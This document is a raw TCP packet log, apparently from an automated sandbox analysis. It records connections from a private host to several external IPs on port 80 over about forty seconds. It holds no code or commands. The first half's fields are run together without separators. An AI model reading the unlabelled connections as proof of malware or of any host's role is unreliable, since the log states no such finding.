                                                                Jan 11, 2025 09:15:16.246645927 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.246658087 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.246660948 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.246675968 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.246682882 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.423428059 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.423451900 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.423464060 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.423499107 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.423506021 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.423537016 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.423569918 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.423582077 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.423607111 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.423655033 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.423693895 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.423729897 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.423768044 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.423778057 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.423851967 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.423887014 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.423902035 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.423923016 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.423975945 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.423984051 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.424011946 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.424046993 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.424056053 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.424082994 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.424118042 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.424128056 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.424153090 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.424186945 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.424197912 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.424222946 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.424256086 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.424274921 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.424290895 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.424325943 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.424336910 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.424362898 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.424408913 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.424768925 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.424804926 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.424839973 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.424850941 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.424875021 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.424910069 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.424920082 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.424945116 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.424982071 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.424989939 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.425017118 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.425052881 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.425060987 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.425087929 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.425122976 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.425132990 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.425158024 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.425194979 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.425215006 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.425513983 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.425549984 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.425560951 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.425585032 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.425621033 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.425631046 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.425656080 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.425690889 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.425702095 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.425729036 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.425765038 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.425777912 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.425800085 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.425833941 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.425853014 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.425870895 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.425900936 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.425920010 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.425990105 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.426026106 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.426038027 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.426062107 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.426096916 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.426115990 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.426132917 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.426168919 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.426187038 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.426388025 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.426423073 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.426440001 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.426460028 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.426496029 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.426505089 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.426532030 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.426567078 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.426582098 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.426601887 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.426636934 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.426650047 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.426671982 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.426708937 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.426717997 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.426744938 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.426779985 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.426793098 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.426815033 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.426850080 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.426862955 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.426884890 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.426919937 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.426933050 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.426954985 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.426994085 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.427006006 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.427180052 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.427215099 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.427225113 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.427251101 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.427298069 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.465662003 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.465677023 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.465683937 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.465703964 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.465715885 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.465728998 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.465739965 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.465953112 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.510588884 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.510601044 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.510613918 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.510668039 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.510698080 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.510710001 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.510720968 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.510732889 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.510741949 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.510763884 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.510925055 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.510935068 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.510946035 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.510957003 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.510968924 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.510974884 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.510981083 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.510992050 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.511042118 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.511076927 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.511086941 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.511099100 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.511110067 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.511115074 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.511121988 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.511132002 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.511143923 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.511143923 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.511154890 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.511172056 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.511189938 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.511291981 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.511302948 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.511322975 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.511327982 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.511362076 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.511507988 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.511519909 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.511533022 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.511543989 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.511555910 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.511565924 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.511567116 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.511581898 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.511595011 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.511617899 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.511629105 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.511667013 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.511740923 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.511753082 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.511764050 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.511775970 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.511786938 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.511790037 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.511799097 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.511810064 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.511811018 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.511821985 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.511833906 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.511837959 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.511846066 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.511857033 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.511888981 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.512140989 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.512151957 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.512187958 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.512275934 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.512288094 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.512299061 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.512310028 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.512322903 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.512322903 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.512334108 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.512343884 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.512346983 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.512366056 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.512368917 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.512377024 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.512388945 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.512401104 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.512413025 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.512414932 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.512424946 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.512435913 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.512448072 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.512459993 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.512460947 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.512485981 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.512795925 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.512808084 CET8049973104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:16.512834072 CET4997380192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:16.512986898 CET8049973104.21.28.65192.168.2.7
Jan 11, 2025 09:15:16.512998104 CET | 80 | 49973 | 104.21.28.65 | 192.168.2.7
Jan 11, 2025 09:15:16.513009071 CET | 80 | 49973 | 104.21.28.65 | 192.168.2.7
Jan 11, 2025 09:15:16.513021946 CET | 80 | 49973 | 104.21.28.65 | 192.168.2.7
Jan 11, 2025 09:15:16.513025999 CET | 49973 | 80 | 192.168.2.7 | 104.21.28.65
Jan 11, 2025 09:15:16.513029099 CET | 80 | 49973 | 104.21.28.65 | 192.168.2.7
Jan 11, 2025 09:15:16.513040066 CET | 80 | 49973 | 104.21.28.65 | 192.168.2.7
Jan 11, 2025 09:15:16.513055086 CET | 49973 | 80 | 192.168.2.7 | 104.21.28.65
Jan 11, 2025 09:15:16.513104916 CET | 49973 | 80 | 192.168.2.7 | 104.21.28.65
Jan 11, 2025 09:15:16.517829895 CET | 49973 | 80 | 192.168.2.7 | 104.21.28.65
Jan 11, 2025 09:15:16.522587061 CET | 80 | 49973 | 104.21.28.65 | 192.168.2.7
Jan 11, 2025 09:15:21.555330038 CET | 49974 | 80 | 192.168.2.7 | 104.21.54.126
Jan 11, 2025 09:15:21.560260057 CET | 80 | 49974 | 104.21.54.126 | 192.168.2.7
Jan 11, 2025 09:15:21.560549021 CET | 49974 | 80 | 192.168.2.7 | 104.21.54.126
Jan 11, 2025 09:15:21.575131893 CET | 49974 | 80 | 192.168.2.7 | 104.21.54.126
Jan 11, 2025 09:15:21.579982042 CET | 80 | 49974 | 104.21.54.126 | 192.168.2.7
Jan 11, 2025 09:15:22.541867018 CET | 80 | 49974 | 104.21.54.126 | 192.168.2.7
Jan 11, 2025 09:15:22.542582035 CET | 80 | 49974 | 104.21.54.126 | 192.168.2.7
Jan 11, 2025 09:15:22.542644978 CET | 49974 | 80 | 192.168.2.7 | 104.21.54.126
Jan 11, 2025 09:15:23.087577105 CET | 49974 | 80 | 192.168.2.7 | 104.21.54.126
Jan 11, 2025 09:15:24.106014013 CET | 49975 | 80 | 192.168.2.7 | 104.21.54.126
Jan 11, 2025 09:15:24.110860109 CET | 80 | 49975 | 104.21.54.126 | 192.168.2.7
Jan 11, 2025 09:15:24.110956907 CET | 49975 | 80 | 192.168.2.7 | 104.21.54.126
Jan 11, 2025 09:15:24.126991034 CET | 49975 | 80 | 192.168.2.7 | 104.21.54.126
Jan 11, 2025 09:15:24.131783962 CET | 80 | 49975 | 104.21.54.126 | 192.168.2.7
Jan 11, 2025 09:15:25.062391043 CET | 80 | 49975 | 104.21.54.126 | 192.168.2.7
Jan 11, 2025 09:15:25.063009977 CET | 80 | 49975 | 104.21.54.126 | 192.168.2.7
Jan 11, 2025 09:15:25.063267946 CET | 49975 | 80 | 192.168.2.7 | 104.21.54.126
Jan 11, 2025 09:15:25.634386063 CET | 49975 | 80 | 192.168.2.7 | 104.21.54.126
Jan 11, 2025 09:15:26.736010075 CET | 49976 | 80 | 192.168.2.7 | 104.21.54.126
Jan 11, 2025 09:15:26.740837097 CET | 80 | 49976 | 104.21.54.126 | 192.168.2.7
Jan 11, 2025 09:15:26.740916014 CET | 49976 | 80 | 192.168.2.7 | 104.21.54.126
Jan 11, 2025 09:15:26.762778997 CET | 49976 | 80 | 192.168.2.7 | 104.21.54.126
Jan 11, 2025 09:15:26.767673016 CET | 80 | 49976 | 104.21.54.126 | 192.168.2.7
Jan 11, 2025 09:15:26.767721891 CET | 80 | 49976 | 104.21.54.126 | 192.168.2.7
Jan 11, 2025 09:15:27.724517107 CET | 80 | 49976 | 104.21.54.126 | 192.168.2.7
Jan 11, 2025 09:15:27.725100040 CET | 80 | 49976 | 104.21.54.126 | 192.168.2.7
Jan 11, 2025 09:15:27.725310087 CET | 49976 | 80 | 192.168.2.7 | 104.21.54.126
Jan 11, 2025 09:15:28.274792910 CET | 49976 | 80 | 192.168.2.7 | 104.21.54.126
Jan 11, 2025 09:15:29.293590069 CET | 49977 | 80 | 192.168.2.7 | 104.21.54.126
Jan 11, 2025 09:15:29.298504114 CET | 80 | 49977 | 104.21.54.126 | 192.168.2.7
Jan 11, 2025 09:15:29.298636913 CET | 49977 | 80 | 192.168.2.7 | 104.21.54.126
Jan 11, 2025 09:15:29.307890892 CET | 49977 | 80 | 192.168.2.7 | 104.21.54.126
Jan 11, 2025 09:15:29.312685966 CET | 80 | 49977 | 104.21.54.126 | 192.168.2.7
Jan 11, 2025 09:15:30.354145050 CET | 80 | 49977 | 104.21.54.126 | 192.168.2.7
Jan 11, 2025 09:15:30.354376078 CET | 80 | 49977 | 104.21.54.126 | 192.168.2.7
Jan 11, 2025 09:15:30.354435921 CET | 49977 | 80 | 192.168.2.7 | 104.21.54.126
Jan 11, 2025 09:15:30.361001015 CET | 49977 | 80 | 192.168.2.7 | 104.21.54.126
Jan 11, 2025 09:15:30.365794897 CET | 80 | 49977 | 104.21.54.126 | 192.168.2.7
Jan 11, 2025 09:15:36.175293922 CET | 49978 | 80 | 192.168.2.7 | 69.57.163.64
Jan 11, 2025 09:15:36.180342913 CET | 80 | 49978 | 69.57.163.64 | 192.168.2.7
Jan 11, 2025 09:15:36.180495024 CET | 49978 | 80 | 192.168.2.7 | 69.57.163.64
Jan 11, 2025 09:15:36.197618008 CET | 49978 | 80 | 192.168.2.7 | 69.57.163.64
Jan 11, 2025 09:15:36.202617884 CET | 80 | 49978 | 69.57.163.64 | 192.168.2.7
Jan 11, 2025 09:15:36.803406954 CET | 80 | 49978 | 69.57.163.64 | 192.168.2.7
Jan 11, 2025 09:15:36.803433895 CET | 80 | 49978 | 69.57.163.64 | 192.168.2.7
Jan 11, 2025 09:15:36.803551912 CET | 49978 | 80 | 192.168.2.7 | 69.57.163.64
Jan 11, 2025 09:15:37.712363958 CET | 49978 | 80 | 192.168.2.7 | 69.57.163.64
Jan 11, 2025 09:15:38.731415033 CET | 49979 | 80 | 192.168.2.7 | 69.57.163.64
Jan 11, 2025 09:15:38.736241102 CET | 80 | 49979 | 69.57.163.64 | 192.168.2.7
Jan 11, 2025 09:15:38.736463070 CET | 49979 | 80 | 192.168.2.7 | 69.57.163.64
Jan 11, 2025 09:15:38.751606941 CET | 49979 | 80 | 192.168.2.7 | 69.57.163.64
Jan 11, 2025 09:15:38.756488085 CET | 80 | 49979 | 69.57.163.64 | 192.168.2.7
Jan 11, 2025 09:15:39.336935043 CET | 80 | 49979 | 69.57.163.64 | 192.168.2.7
Jan 11, 2025 09:15:39.337048054 CET | 80 | 49979 | 69.57.163.64 | 192.168.2.7
Jan 11, 2025 09:15:39.337095976 CET | 49979 | 80 | 192.168.2.7 | 69.57.163.64
Jan 11, 2025 09:15:40.259577036 CET | 49979 | 80 | 192.168.2.7 | 69.57.163.64
Jan 11, 2025 09:15:41.278225899 CET | 49980 | 80 | 192.168.2.7 | 69.57.163.64
Jan 11, 2025 09:15:41.283001900 CET | 80 | 49980 | 69.57.163.64 | 192.168.2.7
Jan 11, 2025 09:15:41.283166885 CET | 49980 | 80 | 192.168.2.7 | 69.57.163.64
Jan 11, 2025 09:15:41.297291994 CET | 49980 | 80 | 192.168.2.7 | 69.57.163.64
Jan 11, 2025 09:15:41.302139044 CET | 80 | 49980 | 69.57.163.64 | 192.168.2.7
Jan 11, 2025 09:15:41.302234888 CET | 80 | 49980 | 69.57.163.64 | 192.168.2.7
Jan 11, 2025 09:15:41.881556034 CET | 80 | 49980 | 69.57.163.64 | 192.168.2.7
Jan 11, 2025 09:15:41.881604910 CET | 80 | 49980 | 69.57.163.64 | 192.168.2.7
Jan 11, 2025 09:15:41.881784916 CET | 49980 | 80 | 192.168.2.7 | 69.57.163.64
Jan 11, 2025 09:15:42.806034088 CET | 49980 | 80 | 192.168.2.7 | 69.57.163.64
Jan 11, 2025 09:15:43.824953079 CET | 49981 | 80 | 192.168.2.7 | 69.57.163.64
Jan 11, 2025 09:15:43.829824924 CET | 80 | 49981 | 69.57.163.64 | 192.168.2.7
Jan 11, 2025 09:15:43.829922915 CET | 49981 | 80 | 192.168.2.7 | 69.57.163.64
Jan 11, 2025 09:15:43.839692116 CET | 49981 | 80 | 192.168.2.7 | 69.57.163.64
Jan 11, 2025 09:15:43.844513893 CET | 80 | 49981 | 69.57.163.64 | 192.168.2.7
Jan 11, 2025 09:15:44.449965954 CET | 80 | 49981 | 69.57.163.64 | 192.168.2.7
Jan 11, 2025 09:15:44.451028109 CET | 80 | 49981 | 69.57.163.64 | 192.168.2.7
Jan 11, 2025 09:15:44.451204062 CET | 49981 | 80 | 192.168.2.7 | 69.57.163.64
Jan 11, 2025 09:15:44.453001022 CET | 49981 | 80 | 192.168.2.7 | 69.57.163.64
Jan 11, 2025 09:15:44.457897902 CET | 80 | 49981 | 69.57.163.64 | 192.168.2.7
Jan 11, 2025 09:15:49.685585022 CET | 49982 | 80 | 192.168.2.7 | 101.32.205.61
Jan 11, 2025 09:15:49.691770077 CET | 80 | 49982 | 101.32.205.61 | 192.168.2.7
Jan 11, 2025 09:15:49.691876888 CET | 49982 | 80 | 192.168.2.7 | 101.32.205.61
Jan 11, 2025 09:15:49.711334944 CET | 49982 | 80 | 192.168.2.7 | 101.32.205.61
Jan 11, 2025 09:15:49.716172934 CET | 80 | 49982 | 101.32.205.61 | 192.168.2.7
Jan 11, 2025 09:15:50.716609001 CET | 80 | 49982 | 101.32.205.61 | 192.168.2.7
Jan 11, 2025 09:15:50.716628075 CET | 80 | 49982 | 101.32.205.61 | 192.168.2.7
Jan 11, 2025 09:15:50.716774940 CET | 49982 | 80 | 192.168.2.7 | 101.32.205.61
Jan 11, 2025 09:15:51.228033066 CET | 49982 | 80 | 192.168.2.7 | 101.32.205.61
Jan 11, 2025 09:15:52.247586012 CET | 49983 | 80 | 192.168.2.7 | 101.32.205.61
Jan 11, 2025 09:15:52.253042936 CET | 80 | 49983 | 101.32.205.61 | 192.168.2.7
Jan 11, 2025 09:15:52.253971100 CET | 49983 | 80 | 192.168.2.7 | 101.32.205.61
Jan 11, 2025 09:15:52.269630909 CET | 49983 | 80 | 192.168.2.7 | 101.32.205.61
Jan 11, 2025 09:15:52.275413036 CET | 80 | 49983 | 101.32.205.61 | 192.168.2.7
Jan 11, 2025 09:15:53.501966000 CET | 80 | 49983 | 101.32.205.61 | 192.168.2.7
Jan 11, 2025 09:15:53.502044916 CET | 80 | 49983 | 101.32.205.61 | 192.168.2.7
Jan 11, 2025 09:15:53.502096891 CET | 49983 | 80 | 192.168.2.7 | 101.32.205.61
Jan 11, 2025 09:15:53.774847984 CET | 49983 | 80 | 192.168.2.7 | 101.32.205.61
